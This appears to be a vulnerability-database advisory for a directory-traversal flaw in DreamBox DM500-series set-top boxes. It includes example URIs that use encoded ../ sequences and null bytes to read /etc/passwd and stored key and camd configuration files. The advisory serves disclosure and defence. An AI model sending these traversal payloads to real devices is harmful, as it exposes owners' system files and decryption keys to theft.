ID
VAR-E-201105-0595
TITLE
DreamBox Multiple DM500 Products Directory Traversal Vulnerability
Trust: 0.3
DESCRIPTION
DreamBox DM500 products are prone to a directory-traversal vulnerability because they fail to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
The following products are vulnerable:
DreamBox DM500
DreamBox DM500+
DreamBox DM500HD
DreamBox DM500S
Trust: 0.3
AFFECTED PRODUCTS
| vendor: | dream | model: | multimedia dreambox dm800 | scope: | - | version: | - | Trust: 0.3 |
| vendor: | dream | model: | multimedia dreambox dm500s | scope: | - | version: | - | Trust: 0.3 |
| vendor: | dream | model: | multimedia dreambox dm500hd | scope: | - | version: | - | Trust: 0.3 |
| vendor: | dream | model: | multimedia dreambox dm500+ | scope: | - | version: | - | Trust: 0.3 |
| vendor: | dream | model: | multimedia dreambox dm500 | scope: | - | version: | - | Trust: 0.3 |
EXPLOIT
An attacker can exploit this issue with a web browser.
The following example URIs are available:
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../Autoupdate.key%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../camd3.config%00
http://www.example.com/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../var/keys/camd3.keys%00
Trust: 0.3
PRICE
Free
Trust: 0.3
TYPE
Input Validation Error
Trust: 0.3
CREDITS
LiquidWorm
Trust: 0.3
EXTERNAL IDS
| db: | BID | id: | 47844 | Trust: 0.3 |
REFERENCES
| url: | http://www.dream-multimedia-tv.de | Trust: 0.3 |
SOURCES
| db: | BID | id: | 47844 |
LAST UPDATE DATE
2022-07-27T09:16:14.899000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 47844 | date: | 2011-06-28T17:00:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 47844 | date: | 2011-05-13T00:00:00 |